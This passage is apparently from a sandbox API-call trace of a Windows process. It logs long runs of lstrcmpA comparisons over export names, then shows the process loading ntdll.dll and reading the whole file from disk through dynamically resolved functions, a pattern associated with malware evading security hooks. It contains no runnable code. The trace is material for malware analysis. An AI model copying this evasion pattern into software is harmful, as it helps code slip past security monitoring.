(lpString1="CheckInitDde", lpString2="CheckInitDde") returned 0 [0113.205] lstrcmpA (lpString1="CleanROTForApartment", lpString2="BindMoniker") returned 1 [0113.205] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserFree") returned -1 [0113.205] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserFree64") returned -1 [0113.205] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserFreeExt") returned -1 [0113.205] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserMarshal") returned -1 [0113.205] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserMarshal64") returned -1 [0113.205] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserMarshalExt") returned -1 [0113.205] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserSize") returned -1 [0113.206] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserSize64") returned -1 [0113.206] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserSizeExt") returned -1 [0113.206] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserUnmarshal") returned -1 [0113.206] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserUnmarshal64") returned -1 [0113.206] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserUnmarshalExt") returned -1 [0113.206] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLSIDFromOle1Class") returned -1 [0113.206] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLSIDFromProgID") returned -1 [0113.206] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLSIDFromProgIDEx") returned -1 [0113.206] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLSIDFromString") returned -1 [0113.206] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0113.206] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0113.206] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0113.206] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0113.206] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0113.206] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0113.206] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0113.206] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0113.206] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0113.206] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdStubBuffer2_Connect") returned -1 [0113.206] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0113.206] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0113.206] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0113.207] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CheckInitDde") returned 1 [0113.207] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CleanROTForApartment") returned 0 [0113.207] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="BindMoniker") returned 1 [0113.207] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserFree") returned -1 [0113.207] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserFree64") returned -1 [0113.207] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserFreeExt") returned -1 [0113.207] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserMarshal") returned -1 [0113.207] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserMarshal64") returned -1 [0113.207] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserMarshalExt") returned -1 [0113.207] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserSize") returned -1 [0113.207] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserSize64") returned -1 [0113.207] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserSizeExt") returned -1 [0113.207] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserUnmarshal") returned -1 [0113.207] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserUnmarshal64") returned -1 [0113.207] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserUnmarshalExt") returned -1 [0113.207] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLSIDFromOle1Class") returned -1 [0113.207] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLSIDFromProgID") returned -1 [0113.207] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLSIDFromProgIDEx") returned -1 [0113.207] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLSIDFromString") returned -1 [0113.208] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0113.208] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0113.208] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0113.208] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0113.208] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0113.208] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0113.208] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0113.208] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0113.208] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0113.208] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdStubBuffer2_Connect") returned -1 [0113.208] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0113.208] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0113.208] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0113.208] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CheckInitDde") returned 1 [0113.208] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CleanROTForApartment") returned 1 [0113.209] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="ClipboardProcessUninitialize") returned 0 [0113.209] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="BindMoniker") returned 1 [0113.209] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserFree") returned 1 [0113.209] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserFree64") returned 1 [0113.209] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0113.209] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0113.209] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0113.209] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0113.209] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserSize") returned 1 [0113.209] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserSize64") returned 1 [0113.209] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0113.209] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0113.209] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0113.209] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 1 [0113.209] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLSIDFromOle1Class") returned 1 [0113.209] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLSIDFromProgID") returned 1 [0113.209] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLSIDFromProgIDEx") returned 1 [0113.209] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLSIDFromString") returned 1 [0113.209] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0113.209] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0113.209] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0113.209] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0113.209] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0113.209] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0113.209] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0113.210] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0113.210] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0113.210] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdStubBuffer2_Connect") returned -1 [0113.210] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0113.210] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0113.210] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0113.210] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CheckInitDde") returned 1 [0113.210] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CleanROTForApartment") returned 1 [0113.210] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="ClipboardProcessUninitialize") returned 1 [0113.210] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CoAddRefServerProcess") returned 1 [0113.210] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CoAicGetTokenForCOM") returned 0 [0113.210] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="BindMoniker") returned 1 [0113.210] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserFree") returned 1 [0113.210] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserFree64") returned 1 [0113.210] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0113.210] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0113.210] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0113.210] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0113.210] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserSize") returned 1 [0113.210] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserSize64") returned 1 [0113.210] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0113.210] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0113.211] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0113.211] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 1 [0113.211] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLSIDFromOle1Class") returned 1 [0113.211] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLSIDFromProgID") returned 1 [0113.211] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLSIDFromProgIDEx") returned 1 [0113.211] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLSIDFromString") returned 1 [0113.211] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0113.211] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0113.211] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0113.211] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0113.211] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0113.212] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0113.212] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0113.212] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0113.212] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0113.212] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdStubBuffer2_Connect") returned -1 [0113.212] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0113.212] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0113.212] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0113.212] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CheckInitDde") returned 1 [0113.212] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CleanROTForApartment") returned 1 [0113.212] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="ClipboardProcessUninitialize") returned 1 [0113.212] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CoAddRefServerProcess") returned 1 [0113.212] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CoAicGetTokenForCOM") returned 1 [0113.212] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CoAllowSetForegroundWindow") returned 0 [0113.212] lstrcmpA (lpString1="CoBuildVersion", lpString2="BindMoniker") returned 1 [0113.213] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserFree") returned 1 [0113.213] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserFree64") returned 1 [0113.213] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0113.213] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0113.213] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0113.213] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0113.213] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserSize") returned 1 [0113.213] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserSize64") returned 1 [0113.213] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0113.213] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0113.213] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0113.213] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 1 [0113.213] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLSIDFromOle1Class") returned 1 [0113.213] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLSIDFromProgID") returned 1 [0113.213] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLSIDFromProgIDEx") returned 1 [0113.213] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLSIDFromString") returned 1 [0113.213] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0113.213] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0113.213] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0113.213] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0113.214] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0113.214] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0113.214] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0113.214] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0113.214] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0113.214] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdStubBuffer2_Connect") returned -1 [0113.214] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0113.214] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0113.214] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0113.214] lstrcmpA (lpString1="CoBuildVersion", lpString2="CheckInitDde") returned 1 [0113.454] GetProcessHeap () returned 0x590000 [0113.454] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x40cf040 | out: hHeap=0x590000) returned 1 [0113.461] GetProcessHeap () returned 0x590000 [0113.462] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x10) returned 0x5a9200 [0113.462] LoadLibraryA (lpLibFileName="Ntdll.dll") returned 0x7ffc5f810000 [0113.463] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0113.463] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0113.463] GetModuleFileNameA (in: hModule=0x7ffc5f810000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0113.463] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0113.463] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0113.463] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0113.463] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=1817160) returned 1 [0113.463] GetProcessHeap () returned 0x590000 [0113.463] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x1bba48) returned 0x40c6040 [0113.468] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0113.468] ReadFile (in: hFile=0x140, lpBuffer=0x40c6040, nNumberOfBytesToRead=0x1bba48, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x40c6040*, lpNumberOfBytesRead=0x14f5a4*=0x1bba48, lpOverlapped=0x0) returned 1 [0113.700] CloseHandle (hObject=0x140) returned 1 [0113.701] lstrcmpA (lpString1="A_SHAFinal", lpString2="A_SHAFinal") returned 0 [0113.701] lstrcmpA (lpString1="A_SHAInit", lpString2="A_SHAFinal") returned 1 [0113.701] lstrcmpA (lpString1="A_SHAInit", lpString2="A_SHAInit") returned 0 [0113.701] lstrcmpA (lpString1="A_SHAUpdate", lpString2="A_SHAFinal") returned 1 [0113.701] lstrcmpA (lpString1="A_SHAUpdate", lpString2="A_SHAInit") returned 1 [0113.701] lstrcmpA (lpString1="A_SHAUpdate", lpString2="A_SHAUpdate") returned 0 [0113.701] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="A_SHAFinal") returned 1 [0113.701] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="A_SHAInit") returned 1 [0113.701] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="A_SHAUpdate") returned 1 [0113.701] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 0 [0113.701] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="A_SHAFinal") returned 1 [0113.701] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="A_SHAInit") returned 1 [0113.701] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="A_SHAUpdate") returned 1 [0113.701] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0113.701] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="AlpcFreeCompletionListMessage") returned 0 [0113.701] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="A_SHAFinal") returned 1 [0113.702] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="A_SHAInit") returned 1 [0113.702] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="A_SHAUpdate") returned 1 [0113.702] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0113.702] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="AlpcFreeCompletionListMessage") returned 1 [0113.702] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="AlpcGetCompletionListLastMessageInformation") returned 0 [0113.702] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="A_SHAFinal") returned 1 [0113.702] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="A_SHAInit") returned 1 [0113.702] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="A_SHAUpdate") returned 1 [0113.702] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0113.702] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="AlpcFreeCompletionListMessage") returned 1 [0113.702] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0113.702] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="AlpcGetCompletionListMessageAttributes") returned 0 [0113.702] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="A_SHAFinal") returned 1 [0113.702] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="A_SHAInit") returned 1 [0113.702] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="A_SHAUpdate") returned 1 [0113.702] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0113.702] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcFreeCompletionListMessage") returned 1 [0113.702] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0113.702] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0113.702] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcGetHeaderSize") returned 0 [0113.702] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="A_SHAFinal") returned 1 [0113.702] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="A_SHAInit") returned 1 [0113.702] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="A_SHAUpdate") returned 1 [0113.702] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0113.702] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcFreeCompletionListMessage") returned 1 [0113.703] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0113.703] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0113.703] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcGetHeaderSize") returned 1 [0113.703] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcGetMessageAttribute") returned 0 [0113.703] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="A_SHAFinal") returned 1 [0113.703] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="A_SHAInit") returned 1 [0113.703] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="A_SHAUpdate") returned 1 [0113.703] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0113.703] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcFreeCompletionListMessage") returned 1 [0113.703] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0113.703] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0113.703] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetHeaderSize") returned 1 [0113.703] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetMessageAttribute") returned 1 [0113.703] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetMessageFromCompletionList") returned 0 [0113.703] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="A_SHAFinal") returned 1 [0113.703] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="A_SHAInit") returned 1 [0113.703] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="A_SHAUpdate") returned 1 [0113.703] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0113.703] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcFreeCompletionListMessage") returned 1 [0113.703] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0113.703] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0113.703] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetHeaderSize") returned 1 [0113.703] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetMessageAttribute") returned 1 [0113.703] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0113.703] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 0 [0113.703] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="A_SHAFinal") returned 1 [0113.703] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="A_SHAInit") returned 1 [0113.704] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="A_SHAUpdate") returned 1 [0113.704] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcAdjustCompletionListConcurrencyCount") 